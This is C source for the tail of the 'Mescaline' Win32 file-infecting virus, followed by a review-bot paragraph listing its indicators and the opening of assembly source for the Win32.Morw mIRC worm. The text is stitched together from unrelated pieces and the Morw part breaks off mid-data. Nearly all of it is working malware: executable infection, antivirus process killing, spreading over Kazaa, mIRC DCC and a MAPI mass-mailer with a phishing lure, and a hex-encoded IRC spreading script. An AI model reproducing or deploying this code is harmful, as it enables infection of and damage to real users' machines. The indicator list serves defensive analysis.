GetFileTime(hfileDT,&creation,&access,&change);
CloseHandle(hfileDT);
strcpy(temp_file,Victim);
strcat(temp_file,"_I");
write_virus(Virus_path,temp_file,virus_size);
File_Handle=fopen(temp_file,"ab");
fwrite(data,ffile.nFileSizeLow,1,File_Handle);
fwrite(mark,sizeof(mark),1,File_Handle);
fclose(File_Handle);
DeleteFile(Victim);
hfileDT=CreateFile(temp_file,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
SetFileTime(hfileDT,&creation,&access,&change);
CloseHandle(hfileDT);
CopyFile(temp_file,Victim,true);
SetFileAttributes(Victim,attr);
}
DeleteFile(temp_file);
free(data);
FindClose(hfile);
}
int Run_Infected_File(char File[],char Parm[],int Virus_Size)
{
FILE *hfile;
HANDLE h_file;
WIN32_FIND_DATA ffile;
int host_size,is_end=0;
void *data;
h_file=FindFirstFile(File,&ffile);
host_size=(ffile.nFileSizeLow-Virus_Size);
hfile=fopen(File,"rb");
if(hfile!=NULL)
{
data=malloc(host_size);
fseek(hfile,Virus_Size,SEEK_SET);
fread(data,host_size,1,hfile);
fclose(hfile);
}
char temp_file[MAX_PATH],cmd[MAX_PATH];
strcpy(temp_file,File);
strcat(temp_file,"_v");
if(GetFileAttributes(temp_file) != -1 && DeleteFile(temp_file) == 0)
{ // ^-&gt; Check If The File Executed Before.
strcat(temp_file," ");
strcat(temp_file,Parm);
free(data);
FindClose(h_file);
WinExec(temp_file,1);
return(1);
}
hfile=fopen(temp_file,"wb");
if(hfile!=NULL)
{
fwrite(data,host_size,1,hfile);
fclose(hfile);
}
free(data);
FindClose(h_file);
SetFileAttributes(temp_file,FILE_ATTRIBUTE_HIDDEN);
strcpy(cmd,temp_file);
if (strlen(Parm) &gt; 0 )
{
strcat(cmd," ");
strcat(cmd,Parm);
}
WinExec(cmd,1);
SleepEx(500,0);
do
{
is_end=DeleteFile(temp_file);
}
while(is_end!=1);
return(1);
}
/*------------------------[Misc Functions]---------------------*/
void PayLoad()
{
SYSTEMTIME time;
GetSystemTime(&time);
if ((time.wHour==0)==1)
{
MessageBox(NULL,"Have You Ever Had The Feeling\nThat You Not Sure If We Wake Or Still Dreaming...\nIt's Call Mescaline\nIt's The Only Way To Fly...",viruscopyright,MB_ICONINFORMATION);
for(int i=1;i&lt;9999;i++)
SetWindowText((HWND)(i),viruscopyright);
}
}
void AntiAV()
{
HANDLE hsnp,hproc;
char MayBeAV[MAX_PATH];
tagPROCESSENTRY32 proc;
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
proc.dwSize=sizeof(proc);
Process32First(hsnp,&proc);
do
{
strcpy(MayBeAV,proc.szExeFile);
strlwr(MayBeAV);
if(strstr(MayBeAV,"anti") != 0 || strstr(MayBeAV,"avp") != 0 ||
strstr(MayBeAV,"rav") != 0 || strstr(MayBeAV,"nav") != 0 ||
strstr(MayBeAV,"troj") != 0 || strstr(MayBeAV,"scan") != 0 ||
strstr(MayBeAV,"viru") != 0 || strstr(MayBeAV,"safe") != 0)
{
hproc=OpenProcess(0,FALSE,proc.th32ProcessID);
TerminateProcess(hproc,666);
CloseHandle(hproc);
}
}
while(Process32Next(hsnp,&proc));
CloseHandle(hsnp);
}
void InitVirus()
{
char *cmd,kernel_path[MAX_PATH];
int pos=0;
HMODULE krnl;
FARPROC RSP;
cmd=GetCommandLine();
cmd++;
do
{
VirusPath[pos]=(*cmd);
pos++;
*cmd++;
}
while((*cmd) != '"');
cmd++;
if ((*cmd) != 0)
{
cmd++;
pos=0;
while((*cmd) != NULL)
{
VirusParameters[pos]=(*cmd);
cmd++;
pos++;
}
}
GetTempPath(MAX_PATH,VirusTempFile);
strcat(VirusTempFile,"Mescaline.exe");
GetSystemDirectory(kernel_path,MAX_PATH);
strcat(kernel_path,"\\Kernel32.dll");
krnl=LoadLibrary(kernel_path);
if (krnl != NULL)
{
RSP=GetProcAddress(krnl,"RegisterServiceProcess");
if (RSP != NULL)
{
__asm
{
push 01h
push 00h
call RSP
}
}
}
FreeLibrary(krnl);
AntiAV();
}
void IRC()
{
char mirc[MAX_PATH],File[MAX_PATH];
FILE *hfile;
strcpy(mirc,"C:\\Program Files\\mIRC\\");
strcpy(File,mirc);
strcat(File,"mirc.ini");
if(GetFileAttributes(File)!=-1)
{
WritePrivateProfileString("rfiles","n2","mirc.dll",File);
strcpy(File,mirc);
strcat(File,"hi.scr");
CopyFile(VirusPath,File,false);
strcpy(File,mirc);
strcat(File,"mirc.dll");
hfile=fopen(File,"w");
if(hfile!=NULL)
{
fprintf(hfile,"on 1:join:#: { if ( $nick == $me ) halt\n");
fprintf(hfile,"else /dcc send $nick %shi.scr }",mirc);
fclose(hfile);
}
}
}
BOOL IsInfectable(char filename[])
{
char last[3];
int i;
for(i=1;i&lt;(int)strlen(filename);i++)
{
last[0]=filename[i-2];
last[1]=filename[i-1];
last[2]=filename[i];
}
strlwr(last);
if(memcmp(last,"exe",3)==0 || memcmp(last,"scr",3)==0)
{
return(TRUE);
}
return(FALSE);
}
int Sucker2Sucker()
{
HKEY hkey;
int RetValue,i,num;;
unsigned char share[MAX_PATH];
unsigned long Sshare=sizeof(share);
char search[MAX_PATH],path[MAX_PATH],full[MAX_PATH],text[3];
HANDLE hfile;
WIN32_FIND_DATA hfind;
RetValue=RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\LocalContent",0,KEY_QUERY_VALUE,&hkey);
if(RetValue != ERROR_SUCCESS)
return(1);
strcpy(search,"");
for(num=48;num!=58;num++)
{
text[0]='d';
text[1]='i';
text[2]='r';
text[3]=num;
for(i=0;i!=4;i++)
search[i]=text[i];
for(i=4;i!=MAX_PATH;i++)
search[i]=NULL;
RetValue=RegQueryValueEx(hkey,search,0,NULL,share,&Sshare);
if(RetValue == ERROR_SUCCESS)
{
for(i=7;i&lt;MAX_PATH;i++)
path[i-7]=share[i];
strcpy(search,path);
strcat(path,"\\*.*");
hfile=FindFirstFile(path,&hfind);
if (hfile != INVALID_HANDLE_VALUE)
{
do
{
strcpy(full,search);
strcat(full,"\\");
strncat(full,hfind.cFileName,sizeof(hfind.cFileName));
if(IsInfectable(full)==TRUE && strlen(full)&gt;10)
Infect_file(VirusPath,full,"Ml");
}
while(FindNextFile(hfile,&hfind));
FindClose(hfile);
}
}
}
RegCloseKey(hkey);
return(1);
}
/*-----------------------[Mapi Worm]----------------------*/
int worming()
{
char mapidll[MAX_PATH];
LPSTR mail_msg="Secret Password,Data,Information Can Be Found Here !!!\nIn This e-mail you can find a lot of secret info\nlike password to web servers and documentation about hacking\nlike 'how to hack web server.txt',or 'How To crack ZIP archive.doc'\n(all documents are in the HackInfo.exe compressed package)\nif you like such stuff you can free register in our web site:\nwww.BestHackersOfTheWorld.com and you will get every week a new\npackage,like the one in the attachment,for free !!!\n\nif you don't want to get mail like this any more please send\n\ta blank e-mail to : BestHackers@dREF.com\n\nand if you want to support us send this mail without any\nchanging to other people that you know.\n\tThank You For Reading This Mail.";
GetSystemDirectory(mapidll,MAX_PATH);
strcat(mapidll,"\\mapi32.dll");
HMODULE MapiModule;
MapiModule=LoadLibrary(mapidll);
__asm
mov eax,01h ; Fix An Expection With The Msoe.dll library
if(MapiModule==NULL)
return(1);
FARPROC SendMail,LogOn,LogOff;
MapiFileDesc mfile;
MapiMessage msg;
MapiRecipDesc rec;
SendMail=GetProcAddress(MapiModule,"MAPISendMail");
LogOn=GetProcAddress(MapiModule,"MAPILogon");
LogOff=GetProcAddress(MapiModule,"MAPILogoff");
LHANDLE MapiSession;
if((LogOn == NULL) || (LogOff == NULL) || (SendMail == NULL))
{
FreeLibrary(MapiModule);
return(1);
}
int retvalue,i;
__asm /* MapiLogOn */
{
lea eax,MapiSession
push eax ;lplhSession
push 00h ;ulReserved
push 00h ;flFlags
push 00h ;lpszPassword
push 00h ;lpszProfileName
push 00h ;ulUIParam
call LogOn
mov retvalue,eax
}
if (retvalue != SUCCESS_SUCCESS)
{
FreeLibrary(MapiModule);
return(1);
}
for(i=1;i&lt;Founded;i++)
{
mfile.lpszPathName=VirusPath;
mfile.lpszFileName="HackInfo - Package1.exe";
mfile.nPosition=-1;
mfile.ulReserved=0;
rec.ulRecipClass=MAPI_TO;
rec.lpszName=addbook[i];
rec.ulReserved=0;
msg.nFileCount=1;
msg.lpszNoteText=mail_msg;
msg.lpszSubject="Best Hackers Teaching You How To Be Hacker !!!";
msg.ulReserved=0;
msg.nRecipCount=1;
msg.lpFiles=&mfile;
msg.lpRecips=&rec;
__asm /* MapiSendMail */
{
push 00h ;ulReserved
push 00h ;flFlags
lea eax,msg
push eax ;lpMessage
push 00h ;ulUIParam
push MapiSession ;lhSession
call SendMail
mov retvalue,eax
}
if (retvalue != SUCCESS_SUCCESS)
{
FreeLibrary(MapiModule);
return(1);
}
}
__asm /* MAPILogoff */
{
push 00h ;ulReserved
push 00h ;flFlags
push 00h ;ulUIParam
push MapiSession;lhSession
call LogOff
}
FreeLibrary(MapiModule);
return(1);
}
void FindFilesAndMails(char where[])
{
char path[MAX_PATH],fullpath[MAX_PATH],buffer[100],mailbuffer[100];
int i=0;
BOOL already_have;
FILE *hfiles;
size_t size;
strcpy(path,where);
strcat(path,"*.*");
WIN32_FIND_DATA find;
HANDLE hfile;
hfile=FindFirstFile(path,&find);
if (hfile != NULL)
{
do
{
strcpy(fullpath,where);
strcat(fullpath,find.cFileName);
strlwr(find.cFileName);
if (find.dwFileAttributes==(FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_DIRECTORY))
{
if ((strcmp(find.cFileName,".") != 0) || (strcmp(find.cFileName,"..") != 0))
{
strcat(fullpath,"\\");
FindFilesAndMails(fullpath);
}
}
if (strstr(find.cFileName,"ht") != 0)
{
hfiles=fopen(fullpath,"rt");
if (hfiles!=NULL)
{
do
{
already_have=FALSE;
strcpy(mailbuffer,"");
size=fread(&buffer,sizeof(buffer),1,hfiles);
strlwr(buffer);
char *temp=strstr(buffer,"mailto:");
if (temp!=NULL)
{
temp=temp+7;
for(i=0;(i&lt;=MAX_PATH)&&(*temp!='"')&&(*temp!='?')&&(*temp!='&lt;');i++,temp++)
mailbuffer[i]=*temp;
mailbuffer[i]=NULL;
if((strstr(mailbuffer,"@")!=NULL) && strlen(mailbuffer)&lt;30)
if (Founded &lt; 299)
{
for(i=1;i&lt;=Founded;i++)
if(strcmp(addbook[i],mailbuffer)==0)
already_have=TRUE;
if(already_have==FALSE)
{
Founded++;
strcpy(addbook[Founded],mailbuffer);
}
}
}
}while(size);
fclose(hfiles);
}
}
}
while(FindNextFile(hfile,&find));
FindClose(hfile);
}
}
void Active_Worm()
{
unsigned char GetValue[MAX_PATH];
unsigned long GetSize=sizeof(GetValue);
char fullpath[MAX_PATH],dir[MAX_PATH];
int i,p=0,x=0;
GetWindowsDirectory(dir,MAX_PATH);
strcat(dir,"\\Temporary Internet Files\\");
FindFilesAndMails(dir);
HKEY hkey;
RegOpenKeyEx(HKEY_CURRENT_USER,"Identities",KEY_QUERY_VALUE,0,&hkey);
strcpy(fullpath,"Identities\\");
x=RegQueryValueEx(hkey,"Default User ID",0,NULL,GetValue,&GetSize);
if (x==0)
{
for(i=strlen(fullpath);i&lt;MAX_PATH;i++,p++)
fullpath[i]=GetValue[p];
strcat(fullpath,"\\Software\\Microsoft\\Outlook Express\\5.0\\Mail");
x=RegOpenKeyEx(HKEY_CURRENT_USER,fullpath,NULL,KEY_WRITE,&hkey);
if (x==0)
RegSetValueEx(hkey,"Warn on Mapi Send",0,REG_DWORD,(LPBYTE)&x,sizeof(x));
} // ^-&gt; Micro$oft Security ;)
RegCloseKey(hkey);
SleepEx(1000,false);
worming();
}
/*-------------------[Memory Resident Functions]--------------*/
BOOL IsProcessExist(char ProcName[])
{
int i;
for(i=0;i&lt;=Position;i++)
{
if(strcmp(lst[i],ProcName)==0)
return (TRUE);
}
return(FALSE);
}
void add_proc(char procname[])
{
if(IsProcessExist(procname)!=TRUE)
{
Position++;
strcpy(lst[Position],procname);
}
}
void ProcFindAll()
{
HANDLE hsnp;
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
stproc.dwSize=sizeof(stproc);
Process32First(hsnp,&stproc);
do
{
add_proc(stproc.szExeFile);
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
}
void FindNextFileToInfect()
{
HANDLE hsnp;
BOOL found_it=TRUE;
char my_Target[MAX_PATH];
strcpy(my_Target,"");
Start:
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
stproc.dwSize=sizeof(stproc);
Process32First(hsnp,&stproc);
do
{
SleepEx(10,0);
if(IsProcessExist(stproc.szExeFile)==FALSE)
{
add_proc(stproc.szExeFile);
strcpy(my_Target,stproc.szExeFile);
break;
}
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
if (strlen(my_Target)==0 && IsProcessExist(my_Target)==TRUE)
{
goto Start;
}
Start2:
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
Process32First(hsnp,&stproc);
do
{
SleepEx(10,0);
if (strcmp(stproc.szExeFile,my_Target) != 0)
{
found_it=FALSE;
}
else if (strcmp(stproc.szExeFile,my_Target) == 0)
{
found_it=TRUE;
}
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
if (found_it==TRUE || strlen(my_Target)==0)
{
goto Start2;
}
if (IsInfectable(my_Target)==TRUE)
{
// MessageBox(NULL,my_Target,"Debug:Virus Catch File",MB_OK);
Infect_file(VirusPath,my_Target,"Ml");
}
}
void TSR_Mode()
{
if(strcmp(VirusTempFile,VirusPath)==0)
{
ProcFindAll();
for(int i=1;i&lt;=2;i++)
{
AntiAV();
FindNextFileToInfect();
}
if(Position==149)
ExitProcess(1);
else if(Position!=149)
{
Active_Worm();
SleepEx(10000,0);
TSR_Mode();
}
}
}
void GoTSR()
{
DeleteFile(VirusTempFile);
if (GetFileAttributes(VirusTempFile)==-1)
{
write_virus(VirusPath,VirusTempFile,virus_size);
SleepEx(500,0);
ShellExecute(NULL,"open",VirusTempFile,"","",1);
}
}
/*----------------------[Main Function]--------------------*/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitVirus();
PayLoad();
GoTSR();
Run_Infected_File(VirusPath,VirusParameters,virus_size);
IRC();
Sucker2Sucker();
if (hPrevInstance)
ExitProcess(1);
TSR_Mode();
return 0;
}
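Review bot: The header comment lists eight steps but omits the concrete artifacts an analyst would look for, and I would document them above `WinMain` instead of changing the code. Visible in the hunk: the resident copy is written to `%TEMP%\Mescaline.exe` (`InitVirus`), running a host leaves `<file>_v` and infecting one leaves a transient `<file>_I` (`Run_Infected_File`, `Infect_file`), infected files carry the trailing marker string `Ml`, `Active_Worm` sets `Warn on Mapi Send` to 0 under the Outlook Express identity key, `IRC()` drops `hi.scr` and a `mirc.dll` script into `C:\Program Files\mIRC\`, the MAPI mail uses the subject `Best Hackers Teaching You How To Be Hacker !!!` with attachment name `HackInfo - Package1.exe`, and `AntiAV` terminates processes whose lowercased image name contains `anti`, `avp`, `rav`, `nav`, `troj`, `scan`, `viru` or `safe`. Note also that this rendering has HTML-escaped angle brackets (`#include &lt;stdio.h&gt;`, `i&lt;9999`), so the text shown here is not byte-faithful to the committed file and should not be used for hashing.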
+994
@@ -0,0 +1,994 @@
;=================================================================================\
; Win32.Morw |
; (c) by DiA/RRLF |
; www.vx-dia.de.vu - www.rrlf.de.vu |
; |
; Heya, long time ago since i brought you something in asm, but here we go again. |
; This is a worm for the mIRC IRC client. It traps mIRC, means when mIRC gets |
; executed the worm gets executed too. It copys then all necessary files to the |
; system directory, generates and load the mIRC script for spreading. Just |
; look at the script to see how it spreads on the "on JOIN" event. If you ask |
; yourself how to make the script readable, go away kiddie. When the user |
; terminate mIRC, the worm unload the script and delete all temporary files. |
; On every 27th of every month the worm notify the infection to a channel at |
; undernet. Just to be proud of my lil creation. At last i must say sorry, no |
; comments in the source, no extended description here... sucks. But this was |
; a fast one, and the code is also very readable. Have fun with it, and don't |
; forget: DO ANYTHING WITH THIS, BUT AT YOUR OWN RISK. I AM NOT RESPONSIBLE! |
; |
; DiA/RRLF - 06.04.2006 |
;=================================================================================/
include "%fasminc%\win32ax.inc"
section "c" code readable writeable executable
;==================================================
MorwData:
jmp MorwCode
CurrentFile rb 256d
WormFile rb 256d
WormName db "morw.exe", 0
SystemDir rb 256d
MircHandle dd ?
MircWindowName db "mIRC", 0
FileMap dd ?
MircData dd ?
MircPath rb 256d
MircPathSize db 255d
MircRegKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC"
MircPathHandle dd ?
UninstallString db "UninstallString", 0
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION
ScriptFile db "morw.mrc", 0
ScriptHandle dd ?
BytesWritten dd ?
ScriptFoot db 13, 10, "}", 13, 10, "}", 13, 10, 0
SystemTime SYSTEMTIME
FilesTable db "IrcTool.exe", 10d
db "Secure_mIRC.exe", 10d
db "SpeedItUp.exe", 10d
db "InsultQuotes.pif", 10d
db "Instruction.pif", 10d
db "Abuse.pif", 10d
db "YourFile.exe", 10d
db "File.exe", 10d
db "Install.exe", 10d
db "Funny.scr", 10d
db "SexyScreensaver.scr", 10d
db "Screensaver.scr", 10d
db 0
FileBuffer rb 256d
MircScript db 0x76, 0x61, 0x72, 0x20, 0x25, 0x6E, 0x0D, 0x0A, 0x6F, 0x6E, 0x20, 0x31, 0x3A, 0x4A, 0x4F, 0x49
db 0x4E, 0x3A, 0x23, 0x3A, 0x7B, 0x0D, 0x0A, 0x25, 0x6E, 0x20, 0x3D, 0x20, 0x24, 0x6E, 0x69, 0x63
db 0x6B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21, 0x3D, 0x20, 0x24, 0x6D, 0x65
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x2F, 0x74, 0x69, 0x6D, 0x65, 0x72, 0x31, 0x20, 0x31, 0x20, 0x36
db 0x30, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70, 0x72, 0x65, 0x61, 0x64, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x7D, 0x0D, 0x0A, 0x41, 0x6C, 0x69, 0x61, 0x73, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70
db 0x72, 0x65, 0x61, 0x64, 0x20, 0x7B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21
db 0x3D, 0x20, 0x24, 0x6D, 0x65, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x6D
db 0x20, 0x3D, 0x20, 0x24, 0x72, 0x61, 0x6E, 0x64, 0x28, 0x31, 0x2C, 0x20, 0x31, 0x32, 0x29, 0x0D
db 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x29, 0x20, 0x7B, 0x0D, 0x0A
db 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x65, 0x79, 0x2C, 0x20, 0x69, 0x20
db 0x66, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D
db 0x65, 0x20, 0x69, 0x72, 0x63, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x2C, 0x20, 0x68, 0x6F, 0x6C, 0x64
db 0x20, 0x6F, 0x6E, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D
db 0x20, 0x49, 0x72, 0x63, 0x54, 0x6F, 0x6F, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x32, 0x29
db 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x69, 0x2C
db 0x20, 0x69, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x6F, 0x6F
db 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x72
db 0x20, 0x6D, 0x49, 0x52, 0x43, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73
db 0x65, 0x6E, 0x64, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65
db 0x63, 0x75, 0x72, 0x65, 0x5F, 0x6D, 0x49, 0x52, 0x43, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D
db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x33
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x63, 0x68
db 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6C, 0x69, 0x74
db 0x74, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x70, 0x65, 0x65
db 0x64, 0x20, 0x75, 0x70, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x74, 0x72, 0x61, 0x6E, 0x73, 0x66
db 0x65, 0x72, 0x73, 0x2C, 0x20, 0x69, 0x74, 0x27, 0x73, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D, 0x65
db 0x2C, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66
db 0x20, 0x3D, 0x20, 0x53, 0x70, 0x65, 0x65, 0x64, 0x49, 0x74, 0x55, 0x70, 0x2E, 0x65, 0x78, 0x65
db 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20
db 0x3D, 0x20, 0x34, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D
db 0x20, 0x45, 0x79, 0x21, 0x20, 0x53, 0x6F, 0x6D, 0x65, 0x20, 0x70, 0x65, 0x6F, 0x70, 0x6C, 0x65
db 0x20, 0x6F, 0x6E, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C
db 0x20, 0x74, 0x6F, 0x6C, 0x64, 0x20, 0x6D, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x69, 0x6E, 0x73
db 0x75, 0x6C, 0x74, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B, 0x20
db 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x71, 0x75
db 0x6F, 0x74, 0x65, 0x73, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x75, 0x6C, 0x74, 0x51, 0x75, 0x6F, 0x74, 0x65, 0x73, 0x2E, 0x70
db 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25
db 0x6D, 0x20, 0x3D, 0x20, 0x35, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73
db 0x20, 0x3D, 0x20, 0x50, 0x6C, 0x65, 0x61, 0x73, 0x65, 0x20, 0x64, 0x6F, 0x6E, 0x27, 0x74, 0x20
db 0x6D, 0x61, 0x6B, 0x65, 0x20, 0x74, 0x72, 0x6F, 0x75, 0x62, 0x6C, 0x65, 0x20, 0x6F, 0x6E, 0x20
db 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C, 0x21, 0x20, 0x53, 0x65
db 0x65, 0x20, 0x74, 0x68, 0x65, 0x73, 0x65, 0x20, 0x69, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74
db 0x69, 0x6F, 0x6E, 0x20, 0x68, 0x6F, 0x77, 0x20, 0x74, 0x6F, 0x20, 0x66, 0x6F, 0x6C, 0x6C, 0x6F
db 0x77, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x75, 0x6C, 0x65, 0x73, 0x20, 0x69, 0x6E, 0x20, 0x74
db 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25
db 0x66, 0x20, 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x2E
db 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28
db 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x36, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25
db 0x73, 0x20, 0x3D, 0x20, 0x41, 0x62, 0x75, 0x73, 0x65, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B
db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6F, 0x72, 0x20, 0x79
db 0x6F, 0x75, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x67, 0x65, 0x74, 0x20, 0x62, 0x61, 0x6E, 0x6E
db 0x65, 0x64, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20
db 0x41, 0x62, 0x75, 0x73, 0x65, 0x2E, 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C
db 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x37, 0x29, 0x20, 0x7B, 0x0D
db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x61, 0x68, 0x68, 0x2C, 0x20, 0x68
db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20
db 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x2E, 0x2E, 0x0D
db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x59, 0x6F, 0x75, 0x72, 0x46, 0x69
db 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69
db 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x38, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61
db 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x79, 0x6F, 0x75, 0x72, 0x20, 0x66, 0x69, 0x6C, 0x65
db 0x2C, 0x20, 0x69, 0x20, 0x6A, 0x75, 0x73, 0x74, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x20, 0x69, 0x74
db 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x6E, 0x6F, 0x77, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72
db 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A
db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20
db 0x39, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68
db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x65, 0x74, 0x75, 0x70
db 0x20, 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x21, 0x20
db 0x77, 0x61, 0x69, 0x74, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
